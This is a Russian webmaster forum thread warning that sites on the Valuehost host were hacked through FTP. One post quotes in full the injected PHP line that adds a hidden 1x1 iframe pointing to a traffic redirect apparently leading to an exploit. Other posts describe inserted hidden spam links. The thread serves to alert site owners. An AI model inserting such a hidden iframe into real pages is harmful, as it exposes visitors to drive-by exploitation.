- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
По причине того, что Валюе как обычно "забыло" предупредить своих клиентов, то ...
Предупреждаю!
17.10.2006 на моем сайте в файле index.php были внесены изменения:
print "</body><iframe src="http://ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1></iframe></html>\n";
нашел, что такое же было зафиксировано 16.10.2006
http://www.master-x.com/forum/topics/72001/
Подобный взлом по фтп случался у Валюе неоднократно, но раньше изменения вносились только в хтмл страницы. Мой случай показывает, что теперь пытаются вносить внешние изменения в системы управления сайтом.
Ну, соответственно, проверьте Ваши сайты и CMS на предмет измененных 16-17 октября файлов.
Это единичный случай, или такое наблюдается на множестве аккаунтов?
Хочу сразу добавить, что моя тема не является моим личным отношением к Валюе. В настоящий момент я на такую тему не созрел. И не думаю, что в этой теме стоит обсуждать позитив/негатив к этому хостеру.
Возникла проблема с несанкционированным доступом по фтп. Хостер сказал, что о проблеме уже известно, дырка закрыта, виновных ищут.
Поиск показал, что я не единственный такой. Поэтому вынес эту новость для всех, чтобы владельцы сайтов проверили наличие указанного кода и вообще ВДРУГ измененные сайты в примерно указанные сроки.
Сколько было подобных случаев - не знаю.
Хотел бы добавить!
Я являюсь владельцем проектов ltds.biz и ltraffic.biz
И заявляю что ltraffic.biz который упоминается в ссылке вставленной в ифрейм никакого отношения ко взлому не имеет! Мы всего лишь предоставляем услугу редиректа, ссылки ведут на эксп к которому мы тоже не имеем никакого отношения.
Тем более что система абсолютно бесплатна и мы не получаем никакого процента от траффика!
А валюхост, если бы вел себя корректно, то мог бы попросить нас закрыть этот аккаунт и вопрос был бы исчерпан! Но они решили кинуться на меня с угрозами о физической расправе! И даже не попросили предоставить информацию о взломщике... странные ребята...
Взлом valuehost происходит неоднократно на протяжении всей истории его существования. Во время последнего хака злоумышленники установили невидимые ссылки на главных страницах, за что сайты улетели в бан в Яндексе.
Нужно иметь завидное мужество и терпение, чтобы продолжать хостить там сайты.
Наблюдал такое же на нескольких сайтах, своих и не только. Имея root доступ к серверам, подобные штуки убирал. Да, это не на всех сайтах сервера было.
Было это несколько месяцев назад, поэтому не могу утверждать, что в iframe был указан ltraffic.biz.
А кто-нибудь знает, каким образом это происходит? Что взламывают?
Нужно иметь завидное мужество и терпение, чтобы продолжать хостить там сайты
Или просто патологическую лень и разгильдяйство, чтобы не переносить сайты на другой хостинг :).
Нужно иметь завидное мужество и терпение, чтобы продолжать хостить там сайты.
Это точно...
Сегодня утром на 2х своих проектах обнаружил такой же взлом.
на ltraffic.biz внедрили в index.html
а на другом ресурсе в index.php (в самом конце файла) вставили около сотни линков на разные сайты.
Но вот не додумался обратить внимание какого числа были произведены изменения.
Такой хак на своих ресурсах (расположенных на валуе) я наблюдаю уже во второй раз. 😕
Раз пошла такая пьянка ...
Только на своих проектах наблюдаю третий раз за текущий год. :)
1. нашел левый файл состоящий из одной ссылки на чужой ресурс (стоит цмс)
2. нашел левый почтовый ящик (можно создать только в админке)
3. указанное в теме.
26.11 опять история повторяется с одним из проектов (и хостинг, и ссылка те же)
"на другом ресурсе в index.php (в самом конце файла) вставили около сотни линков на разные сайты"
с этим же проектом такое случилось в конце мая, линки были на забугорные сайты...